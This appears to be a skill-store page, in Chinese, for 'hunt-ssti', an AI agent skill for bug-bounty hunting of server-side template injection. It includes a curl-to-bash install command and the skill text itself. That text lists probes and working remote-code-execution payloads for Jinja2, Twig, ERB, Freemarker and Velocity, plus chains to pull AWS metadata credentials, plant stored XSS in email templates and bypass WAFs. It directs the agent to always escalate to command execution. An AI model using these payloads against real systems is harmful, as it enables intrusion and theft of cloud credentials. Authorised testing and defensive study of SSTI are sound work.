‹ 首页

hunt-ssti

@elementalsouls · 收录于 1 周前 · 上游提交 2 周前

Hunt server-side template injection (SSTI) across Jinja2 (Flask/Django), Twig (Symfony), Freemarker (Java), ERB (Rails), Spring, Velocity, Mako, Thymeleaf, Smarty. Detection probes use double-curly and dollar-curly math expressions evaluated server-side. Once an engine is fingerprinted, escalate to RCE via the engine-specific class-walker, callback-registrar, or Execute-utility patterns documented in disclosed reports. Detection patterns: error messages reveal engine, blank or numeric eval reveals expression mode. Targets: email templates, PDF/report generators, CMS preview features, error pages with user input. Use when hunting RCE via template rendering, when content shows engine fingerprints, when finding endpoints that compose strings with user input before render.

适合你,如果你需要检测和利用SSTI漏洞进行安全评估

/ 下载安装
hunt-ssti.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add elementalsouls/claude-bughunter/hunt-ssti
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/hunt-ssti
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify elementalsouls/claude-bughunter/hunt-ssti
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2927GitHub stars
~842上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 05098fc · 表述以原文为准
它做什么

装上后,Claude 会检测服务器端模板注入漏洞。它会发送探测载荷(如 {{7*7}})识别模板引擎类型,然后根据引擎类型尝试提升为远程代码执行(RCE)。

什么时候触发

当用户要求检测模板注入漏洞,或发现端点将用户输入拼接到模板中时触发。

装好后可以这样说
Claude 会发送探测载荷并分析响应。
Claude 会尝试 {{7*7}} 等载荷。
Claude 会针对常见引擎发送探测。
技能原文 SKILL.md作者撰写 · MIT · 05098fc
14. SSTI — SERVER-SIDE TEMPLATE INJECTION
Easy to detect, high payout ($2K–$8K). Direct path to RCE.
Detection Payloads (try all)
{{7*7}}          → 49 = Jinja2 / Twig
${7*7}           → 49 = Freemarker / Velocity / Mako (all use ${...})
<%= 7*7 %>       → 49 = ERB (Ruby)
*{7*7}           → 49 = Spring Thymeleaf
{{7*'7'}}        → 7777777 = Jinja2 (Python string repetition); 49 = Twig (numeric coercion of '7'). Differentiates Jinja2 from Twig.
RCE Payloads

Jinja2 (Python/Flask):

{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

Twig (PHP/Symfony):

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

ERB (Ruby):

<%= `id` %>
Where to Test
Name/bio/description fields, email templates, invoice name, PDF generators,
URL path parameters, search queries reflected in results, HTTP headers reflected

Related Skills & Chains
  • hunt-rce — SSTI is the easiest path to RCE on Python/Ruby/PHP/Java stacks because the template language already exposes the runtime. Chain primitive: Jinja2 {{config.__class__.__init__.__globals__['os'].popen('id').read()}} or Freemarker <#assign x="freemarker.template.utility.Execute"?new()>${x("id")} → unauthenticated RCE as the rendering worker. Always escalate fingerprint → class-walker → cmd exec.
  • hunt-xss — When the template engine sandboxes the runtime (or you only get the rendered output back as HTML), the same {{7*7}} reflection often still yields stored XSS. Chain primitive: sandboxed Jinja2 SSTI without escapes → inject <script> into rendered email template → stored XSS hitting every recipient who views the message.
  • hunt-ssrf — Template engines often expose URL fetchers/filters before they expose the runtime, giving you SSRF before RCE. Chain primitive: Twig {{ include('http://169.254.169.254/latest/meta-data/iam/security-credentials/') }} or Jinja2 with url_for/custom filters → AWS metadata exfil → cloud creds.
  • hunt-file-upload — Office docs, SVGs, and email templates uploaded by the user are common SSTI surfaces (the server re-renders them). Chain primitive: upload a DOCX whose word/document.xml contains ${T(java.lang.Runtime).getRuntime().exec("id")} to a Velocity/Freemarker-driven mail-merge → RCE.
  • security-arsenal — Reach for the engine-specific escape payload tree: Jinja2 class-walker variants (__subclasses__()[N] index hunting), Twig _self.env registerUndefinedFilterCallback, Freemarker ?new() Execute, ERB backticks, Velocity $class.inspect, Smarty {php}...{/php}, plus the WAF-bypass variants ({{request|attr('application')|...}}, Unicode escapes, {%print(...)%}).
  • triage-validation — Apply the Pre-Severity Gate before claiming Critical RCE. A {{7*7}} → 49 reflection inside a sandboxed engine (e.g., Twig sandbox mode, Jinja2 SandboxedEnvironment with no escape) is Medium SSTI, not Critical RCE. Prove id/OOB DNS callback with a unique marker before writing the report.
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。